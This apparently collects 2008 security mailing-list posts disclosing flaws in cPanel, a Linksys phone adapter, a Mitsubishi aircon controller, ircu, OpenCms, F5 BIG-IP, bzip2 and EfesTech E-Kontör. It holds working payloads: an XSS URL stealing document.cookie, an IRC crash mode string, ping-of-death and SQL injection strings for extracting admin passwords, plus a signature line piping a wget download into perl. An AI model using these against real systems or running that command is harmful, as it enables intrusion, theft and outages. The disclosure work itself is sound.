tMrADJFfxK6fnyj+Gacyf1N3k6Ph6TspJ5TuJGFrH8EJKDhhR7s66g== =xQXP -END PGP SIGNATURE-
Re: XSS in cPanel 11.x
Hello, Is this internal or external thus do you need to be logged in? I tested external/internal and nothing it appears to just dump it out as a missing directory or manpage. "Could not open /usr/man/man3/%3Cscript%3Ealert(LeZr)%3C/script%3E.3" Also I believe you meant to place x3 instead of x after frontend? if not it still just says manpage not found. I tested this out on 11.18.3-STABLE build 21703. Regards Joshua
Re: Linksys phone adapter denial of service
[EMAIL PROTECTED] wrote: Linksys phone adapter denial of service Product Information Product Name: SPA-2102Serial Number: FM500G582390 Software Version: 3.3.6 Hardware Version: 1.2.5(a) Another device hit with the PoD! ping -l 65500 192.168.0.1 Only seems to work on the internal network. discovered by sipher http://core.ifconfig.se/~core/ This is just as bad as the "pull the plug out of the device" since you're local attack. Is Linksys going to provide an epoxy fix for the plug? -- J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x3AC173DB smime.p7s Description: S/MIME Cryptographic Signature
RE: hacking the mitsubishi GB-50A
If you read your own post you would realize that Mitsubishi kept the device ipaddress prefix as 192.168.1 so only you can attack yourself. 192.168 cannot be access from the internet ;-) [unless you NAT at which point its your NAT config problem] -Original Message- From: Chris Withers [mailto:[EMAIL PROTECTED] Sent: Friday, March 21, 2008 9:50 PM To: bugtraq@securityfocus.com Subject: hacking the mitsubishi GB-50A Hi All, Well, it's been over 4 months since my plea for a security contact at Mitsubishi Electric to come forward. Since no one has, I thought I'd release a POC for hacking one. It's not exactly hard, the web controller uses a nasty set of Java applets to interact with itself. The shocking thing is that these communicate using a series of xml packets and absolutely zero authentication or encryption :-( Oh, and just in case you thought about maybe putting something secure like an ssl webserver proxying the thing, these java applets are hard coded to connect back to port 80 on the originating host using HTTP :-( Still, you should get an idea of how the box is *supposed* to be used by the fact that its ip address is set with dip switches where the 192.168.1 bit is hard coded! *sigh* Well, please find attached a little python script that will let you turn on or off every aircon unit attached to a GB-50 that you know the ip address of. Minor modifications will let you change the set point and mode too, so you might be able to turn off a data centres aircon *or* turn an office's aircon up to 28'C and then turn it all on ;-) The plus side is that because it's so rediculously insecure, it's not that hard to build a secure web app that can interact with it and then just firewall it off from anywhere harmful... If you have a GB-50 or a GB-50A, please make very sure you keep it on its own private network until Mitsubishi Electric find a clue stick to hit themselves with! cheers, Chris -- Simplistix - Content Management, Zope & Python Consulting - http://www.simplistix.co.uk
ircu/snircd remote crash vulnerability
Affected software - ircu (upto and including 2.10.12.12) snircd (upto and including 1.3.4) and many other ircu derivatives Vulnerability details - send_user_mode in s_user.c does not check that the argument after a +r mode is present, if it is not than the NULL sentinel may be missed, causing the function to iterate over the boundary of the array. One possible exploit: /mode nickname i i i i i i i i i i i i i i i r r r r s This won't work if there's another NULL directly after the first from the previous parsed command, if this is the case one can just append more modes or send some other junk to the ircd. Resolution -- Upgrade to the very latest version of ircu/snircd. Disclosure timeline --- 2008-03-15: Vulnerability discovered by QuakeNet and reported to Undernet. 2008-03-15: Patches released. 2008-03-17: Patches applied to public servers. 2008-03-24: Public disclosure. -- Chris Porter (slug on QuakeNet) http://www.warp13.co.uk
Alkacon OpenCms users_list.jsp searchfilter XSS
Alkacon OpenCms users_list.jsp searchfilter XSS Product: Alkacon OpenCms http://www.opencms.org/ OpenCms contains a cross-site scripting vulnerability in the user management function. Input to parameter searchfilter in page opencms/system/workplace/admin/accounts/users_list.jsp is not sufficiently validated and/or sanitized before it gets embedded in the resulting web page. Example: http://(target)/opencms/system/workplace/admin/accounts/users_list.jsp? ispopup=&action=listsearch&framename=&title= &closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit &preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems= &formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root= &path=%252Faccounts%252Forgunit%252Fusers&redirect= &searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E &listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E The vulnerability has been identified in version 7.0.3. However, other versions may be also affected. Solution: Users should not browse untrusted sites while logged into OpenCms. Found by: nnposter
Linksys phone adapter denial of service
Linksys phone adapter denial of service Product Information Product Name: SPA-2102Serial Number: FM500G582390 Software Version: 3.3.6 Hardware Version: 1.2.5(a) Another device hit with the PoD! ping -l 65500 192.168.0.1 Only seems to work on the internal network. discovered by sipher http://core.ifconfig.se/~core/
[ MDVSA-2008:075 ] - Updated bzip2 packages fix denial of service vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:075 http://www.mandriva.com/security/ ___ Package : bzip2 Date: March 23, 2008 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: Bzip2 versions before 1.0.5 are vulnerable to a denial of service attack via malicious compressed data. The updated packages have been patched to prevent the issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372 ___ Updated Packages: Mandriva Linux 2007.0: d7ec22e71581a3f3b8482d69a6310045 2007.0/i586/bzip2-1.0.3-6.1mdv2007.0.i586.rpm 6698bcb0d8e5e7c4af5d9577301a0d48 2007.0/i586/libbzip2_1-1.0.3-6.1mdv2007.0.i586.rpm 3558992b5f4f864d4d77d609c54455c6 2007.0/i586/libbzip2_1-devel-1.0.3-6.1mdv2007.0.i586.rpm 5f6aade9d8b336a05d676d17eb3d4d62 2007.0/SRPMS/bzip2-1.0.3-6.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: f8df805e9268ffe67cf1c2c212ef04d5 2007.0/x86_64/bzip2-1.0.3-6.1mdv2007.0.x86_64.rpm 58558f1cb97936b06b67c9c235c65517 2007.0/x86_64/lib64bzip2_1-1.0.3-6.1mdv2007.0.x86_64.rpm 009ba4b9c280c0d56e10f4e75f23bc94 2007.0/x86_64/lib64bzip2_1-devel-1.0.3-6.1mdv2007.0.x86_64.rpm 5f6aade9d8b336a05d676d17eb3d4d62 2007.0/SRPMS/bzip2-1.0.3-6.1mdv2007.0.src.rpm Mandriva Linux 2007.1: 1389e0beda990aa84af7ae94793526b3 2007.1/i586/bzip2-1.0.4-1.1mdv2007.1.i586.rpm 9c7e8bfac1f7ac9f07bc050c3df6f8c1 2007.1/i586/libbzip2_1-1.0.4-1.1mdv2007.1.i586.rpm e26e2d2a349f2d2544b476e3c27b7ba1 2007.1/i586/libbzip2_1-devel-1.0.4-1.1mdv2007.1.i586.rpm ef241d50e1564d017eead857ba1bca68 2007.1/SRPMS/bzip2-1.0.4-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 02f720b94ab3622adb12d27a9b0bcff8 2007.1/x86_64/bzip2-1.0.4-1.1mdv2007.1.x86_64.rpm d7d70f134895fbf1c73148ff0b218d20 2007.1/x86_64/lib64bzip2_1-1.0.4-1.1mdv2007.1.x86_64.rpm 89b13bb16b9212513aa2b90405de07fa 2007.1/x86_64/lib64bzip2_1-devel-1.0.4-1.1mdv2007.1.x86_64.rpm ef241d50e1564d017eead857ba1bca68 2007.1/SRPMS/bzip2-1.0.4-1.1mdv2007.1.src.rpm Mandriva Linux 2008.0: b20b1778b84d5862d273c93928ea3586 2008.0/i586/bzip2-1.0.4-2.1mdv2008.0.i586.rpm e69979ee6cae516a3251ea277f0b41b3 2008.0/i586/libbzip2_1-1.0.4-2.1mdv2008.0.i586.rpm 9f871864bd0d87f383fa836a83c16739 2008.0/i586/libbzip2_1-devel-1.0.4-2.1mdv2008.0.i586.rpm 06bbfb1a27cfb8283cb54fec90877000 2008.0/SRPMS/bzip2-1.0.4-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: a5232c78a8556018adb3f777fd533e86 2008.0/x86_64/bzip2-1.0.4-2.1mdv2008.0.x86_64.rpm 3c58e84746fdd94f689f358692ef917e 2008.0/x86_64/lib64bzip2_1-1.0.4-2.1mdv2008.0.x86_64.rpm 66d7a3b544e5fda5c64af19e5ff1c117 2008.0/x86_64/lib64bzip2_1-devel-1.0.4-2.1mdv2008.0.x86_64.rpm 06bbfb1a27cfb8283cb54fec90877000 2008.0/SRPMS/bzip2-1.0.4-2.1mdv2008.0.src.rpm Corporate 3.0: 197212b185073ae1cd28dfd6e962907c corporate/3.0/i586/bzip2-1.0.2-17.5.C30mdk.i586.rpm 566a9bc102a67b5979adab8490d72a3d corporate/3.0/i586/libbzip2_1-1.0.2-17.5.C30mdk.i586.rpm 03faec871e264e5e13ed7d3d4054effa corporate/3.0/i586/libbzip2_1-devel-1.0.2-17.5.C30mdk.i586.rpm 9e3a038f1824a3d294c1b58bcd5d8d2a corporate/3.0/SRPMS/bzip2-1.0.2-17.5.C30mdk.src.rpm Corporate 3.0/X86_64: e9137338bd9e2fec22cf34f8dd08e024 corporate/3.0/x86_64/bzip2-1.0.2-17.5.C30mdk.x86_64.rpm 8385be2baa4f10e47a9b0e382103281e corporate/3.0/x86_64/lib64bzip2_1-1.0.2-17.5.C30mdk.x86_64.rpm aa724051a95ec66cfb1961ce532ba9af corporate/3.0/x86_64/lib64bzip2_1-devel-1.0.2-17.5.C30mdk.x86_64.rpm 9e3a038f1824a3d294c1b58bcd5d8d2a corporate/3.0/SRPMS/bzip2-1.0.2-17.5.C30mdk.src.rpm Corporate 4.0: 43c2884e3f37d6cd36fdc7496ff095f8 corporate/4.0/i586/bzip2-1.0.3-1.3.20060mlcs4.i586.rpm fa484966a13c0deb5d5a324c9e7bce03 corporate/4.0/i586/libbzip2_1-1.0.3-1.3.20060mlcs4.i586.rpm 0fb3793ebb134cfd0079624d16e2b7aa corporate/4.0/i586/libbzip2_1-devel-1.0.3-1.3.20060mlcs4.i586.rpm 63df10cb7218c2aaa90c92a64ef4fe7b corporate/4.0/SRPMS/bzip2-1.0.3-1.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: d93be85bc254492e1e9cffe621829915 corporate/4.0/x86_64/bzip2-1.0.3-1.3.20060mlcs4.x86_64.rpm d58a247591e813b1a35288ac783cb923 corporate/4.0/x86_64/lib64bzip2_1-1.0.3-1.3.20060mlcs4.x86_64.rpm dcb647a39aed74d14a9b5e855ffc9470 corporate/4.0/x86_64/lib64bzip2_1-devel-1.0.3-1.3.20060mlcs4.x86_64.rpm 63df10cb7218c2aaa90c92a64ef4fe7b corporate/4.0/SRPMS/bzip2-1.0.3-1.3.20060mlcs4.src.rpm Multi Network Firewall 2.0: 195b188697db7d58b13eba19ad569276 mnf/2.0/i586/bzip2-1.0.2-17.5.M20mdk.i586.rpm 9ff6a10c830c15f31f88db7c7bb
Re: Potential SQL injection vulnerability in Apache::AuthCAS
Never saw this email that supposedly was sent to me, but I did run across a patch on CPAN a user sent me referencing this post. I have updated the module to use only bind parameters to guard against this issue. It's currently pending on CPAN
F5 BIG-IP Web Management Audit Log XSS
F5 BIG-IP Web Management Audit Log XSS Product: F5 BIG-IP http://www.f5.com/products/big-ip/ The F5 BIG-IP web management interface contains a persistent cross-site scripting vulnerability in the audit log facility. Log entries are output raw, without being HTML-encoded first. This allows an attacker to create a log entry with an embedded script that gets executed any time the audit log is later reviewed by an administrator. One of several exploit vectors is to create a node object with a script embedded in the node name. The creation will fail due to unsupported characters but an audit log entry still gets created. Other confirmed entry points are sysContact and sysLocation on the SNMP configuration page. It is possible to craft URL links that would generate a suitable log entry with a simple HTTP GET request. This allows the attack to be carried out remotely. The vulnerability has been identified in version 9.4.3. However, other versions may be also affected. Solution: Do not use the web management interface to review audit logs. Use SSH CLI instead. Found by: nnposter
EfesTech E-Kontr (id) Remote SQL INJECTION
## $Author = RMx $home page = www.coderx.org $thanks = Dynamic , TR_IP , Liz0zim $Script name = Efestech E-Kontör (tr) $script test = http://www.aspindir.com/Goster/5145 $script sales = 750 YTL ## // EfesTech E-Kontör (id) Remote SQL INJECTION // Table names id no = id password : sifre users = firma exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1 explot for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 NOTe = İD values 1 or 2 for admin Bye